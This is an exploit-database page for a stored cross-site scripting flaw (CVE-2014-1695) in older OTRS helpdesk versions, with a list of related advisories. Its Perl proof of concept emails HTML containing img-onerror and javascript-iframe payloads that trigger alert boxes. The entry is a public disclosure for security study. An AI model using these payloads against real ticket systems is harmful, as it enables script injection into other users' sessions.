Lucene search
+L

OTRS < 3.1.x / < 3.2.x / < 3.3.x - Persistent Cross-Site Scripting

🗓️ 27 Apr 2015 00:00:00Reported by Adam ZiajaType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 54 Views

OTRS Stored Cross-Site Scripting (XSS) CVE-2014-169

Related
Code
ReporterTitlePublishedViews
Family
zdt
OTRS < 3.1.x & < 3.2.x & < 3.3.x - Stored Cross-Site Scripting (XSS) Vulnerability
27 Apr 201500:00
zdt
freebsd
otrs -- XSS Issue
25 Feb 201400:00
freebsd
cve
CVE-2014-1695
28 Feb 201417:00
cve
cvelist
CVE-2014-1695
28 Feb 201417:00
cvelist
debian
[SECURITY] [DLA 1119-1] otrs2 security update
30 Sep 201719:35
debian
debiancve
CVE-2014-1695
28 Feb 201417:00
debiancve
nessus
Debian DLA-1119-1 : otrs2 security update
2 Oct 201700:00
nessus
nessus
FreeBSD : otrs -- XSS Issue (70b72a52-9e54-11e3-babe-60a44c524f57)
26 Feb 201400:00
nessus
nessus
Mandriva Linux Security Advisory : otrs (MDVSA-2014:054)
14 Mar 201400:00
nessus
nessus
openSUSE Security Update : otrs (openSUSE-SU-2014:0360-1)
13 Jun 201400:00
nessus
Rows per page
# Exploit Title: Stored Cross-Site Scripting (XSS) in OTRS
# Date: 28.01.2014
# Exploit Author: Adam Ziaja http://adamziaja.com
# Vendor Homepage: https://www.otrs.com
# Version: 3.1.x before 3.1.20, 3.2.x before 3.2.15, and 3.3.x before 3.3.5
# CVE : CVE-2014-1695

#!/usr/bin/perl -w
use strict;
use MIME::Lite;
my $msg = MIME::Lite->new(
    Subject => 'OTRS XSS PoC',
    From => '[email protected]',
    To => '[email protected]',
    Type => 'text/html',
    Data =>
        '<html><body><img/onerror="alert(\'XSS1\')"src=a><iframe
src=javasc&#x72ipt:alert(\'XSS2\') ></body></html>'
);
$msg->send();

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

27 Apr 2015 00:00Current
9High risk
Vulners AI Score9
CVSS 24.3
EPSS0.04913
54